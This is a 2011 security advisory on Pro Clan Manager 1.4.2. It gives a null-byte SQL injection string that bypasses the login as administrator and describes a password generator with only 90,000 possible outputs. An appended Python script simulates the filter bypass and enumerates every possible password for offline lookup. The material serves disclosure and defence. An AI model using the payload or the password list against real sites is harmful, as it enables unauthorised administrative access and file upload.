Pro Clan Manager, Multiple Vulnerabilities

===============
Document Details
===============

Version 1.0, 2011-11-19

===============
Background
===============

"The aim of Pro Clan Manager is to create an international content management system dedicated to helping Clans or Guilds work together and have a good looking website that is W3C valid." [1]

Both of the listed issues allow an unauthenticated attacker with no prior knowledge of the target to gain administrative access to the application. Administrative access includes permission to upload arbitrary files, such as PHP scripts.

===============
Versions
===============

Version 1.4.2 was tested. In response to these issues the author has decided to officially discontinue the project. Users should uninstall the software as soon as possible and then find a replacement.

===============
Finding 1 - SQL Injection
===============

Description

Throughout the application, strings that are used in dynamic query construction are validated with the $post->Text method, and those fields do not appear to be vulnerable to SQL injection. The login field, however, is validated by $post->LoginFilter, which uses eregi() to ensure that no non-alphanumeric characters are present. eregi() expects a C-style null-terminated string and does not inspect anything beyond the first null byte it encounters, so the filter only ever sees the part of the login value that precedes that byte. By prefixing a SQL injection payload with a null byte, the filter is bypassed while the full value, null byte included, still reaches the query.

The following attack string, submitted in the login field, can be used to access the system as the administrator:

notarealuser%00'+union+select+1;#

This needs to be sent as raw HTTP: the %00 must arrive as a URL-encoded sequence that the server decodes to a literal null byte. Typing the string into the browser's login form does not work, because the browser re-encodes the % character and the server never sees a null byte.

===============
Finding 2 - Poor Random Password Generation
===============

Description

Line 302 of includes/user.php generates passwords for new users and for users whose passwords have been reset by an administrator:
$password = substr(md5(rand(10000,99999)), 5, 8);

While the passwords generated by this code look random, the snippet above makes it clear that rand(10000,99999) can only return 90,000 distinct values, so the code can produce at most 90,000 distinct passwords (eight hexadecimal characters taken from a fixed position of the MD5 hex digest of the chosen number). A complete list of these passwords is easy to construct; when used in an automated attack it took around 15 minutes on average to successfully guess a random password. The complete list can be obtained from the following URL: http://dmcdonald.net/pcm-passgen.php

===============
References
===============

[1] Pro Clan Manager SourceForge page, http://sourceforge.net/projects/autoweb/, accessed 2011-11-19

===============
Links
===============

http://dmcdonald.net/?page_id=51 - The latest version of this advisory
http://dmcdonald.net/pcm-passgen.php - A script to generate a complete list of possible random passwords
http://dmcdonald.net/pcm-passgen.txt - The source code for pcm-passgen.php
http://www.proclanmanager.com - The Pro Clan Manager website

-----
Renski aka Darren McDonald
http://dmcdonald.net
M6LUL
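The following Python script is an added worked example for both findings; it is not part of the original advisory and not code from the Pro Clan Manager project. For Finding 1 it simulates, rather than calls, the behaviour the advisory attributes to eregi(): the legacy filter only examines the text before the first null byte, while a binary-safe filter examines the whole value, and a form-decoding helper shows why the %00 in the advisory's payload has to be sent as raw HTTP. For Finding 2 it reproduces the password generator's output space in Python (MD5 hex digest of the decimal seed, characters 5 to 12, for every seed rand(10000,99999) can return), so the size of the candidate list and an offline lookup of a generated password can be checked without the original pcm-passgen.php. The function names, the constructed sample inputs and the filter simulation are assumptions made for this example.

```python
"""Added example (not part of the Pro Clan Manager advisory or code base):
offline reproduction of the two weaknesses described above.

The filter functions below are a simulation of the behaviour the advisory
attributes to eregi(); they are not PHP's eregi() itself.
"""
import hashlib
import re
from urllib.parse import unquote_plus

# Finding 1: alphanumeric-only login filter, with and without the
# C-string truncation that lets a null byte hide the payload.
_ALNUM = re.compile(r"[A-Za-z0-9]+")

# Attack string taken from the advisory, as it appears in the raw request body.
ADVISORY_PAYLOAD = "notarealuser%00'+union+select+1;#"


def decode_form_value(raw: str) -> str:
    """Decode an application/x-www-form-urlencoded value the way the server
    does: '+' becomes a space and %00 becomes a literal NUL byte. A browser
    would have re-encoded the '%' as '%25', which is why the advisory says
    the payload must be sent as raw HTTP."""
    return unquote_plus(raw)


def legacy_login_filter(login: str) -> bool:
    """Simulated C-string filter: only the text before the first NUL byte is
    visible to the alphanumeric check, so anything after it passes unseen."""
    visible = login.split("\x00", 1)[0]
    return _ALNUM.fullmatch(visible) is not None


def binary_safe_login_filter(login: str) -> bool:
    """Hardened check: reject NUL bytes outright and validate the whole value."""
    return "\x00" not in login and _ALNUM.fullmatch(login) is not None


# Finding 2: the complete output space of
#     substr(md5(rand(10000,99999)), 5, 8)
SEED_MIN, SEED_MAX = 10000, 99999  # rand() bounds are inclusive in PHP


def pcm_password(seed: int) -> str:
    """Python equivalent of the PHP expression for one seed: md5() hashes the
    decimal string form of the integer, substr(..., 5, 8) takes hex digest
    characters 5 through 12."""
    return hashlib.md5(str(seed).encode("ascii")).hexdigest()[5:13]


def password_space() -> dict:
    """Every password the generator can produce, mapped to the first seed
    that yields it. 90,000 seeds, so at most 90,000 distinct passwords."""
    space = {}
    for seed in range(SEED_MIN, SEED_MAX + 1):
        space.setdefault(pcm_password(seed), seed)
    return space


def recover_seed(password: str):
    """Offline lookup: a seed that produces the given password, or None if the
    password cannot have come from this generator at all."""
    return password_space().get(password)


if __name__ == "__main__":
    decoded = decode_form_value(ADVISORY_PAYLOAD)
    print("decoded payload:", repr(decoded))
    print("legacy filter accepts payload:", legacy_login_filter(decoded))
    print("binary-safe filter accepts payload:", binary_safe_login_filter(decoded))
    space = password_space()
    print("distinct passwords:", len(space), "from", SEED_MAX - SEED_MIN + 1, "seeds")
```

Running the script shows the decoded payload passing the simulated legacy filter and failing the binary-safe one, and a candidate list of about 90,000 eight-character passwords, which is the size of the list the advisory's automated guessing attack iterates over.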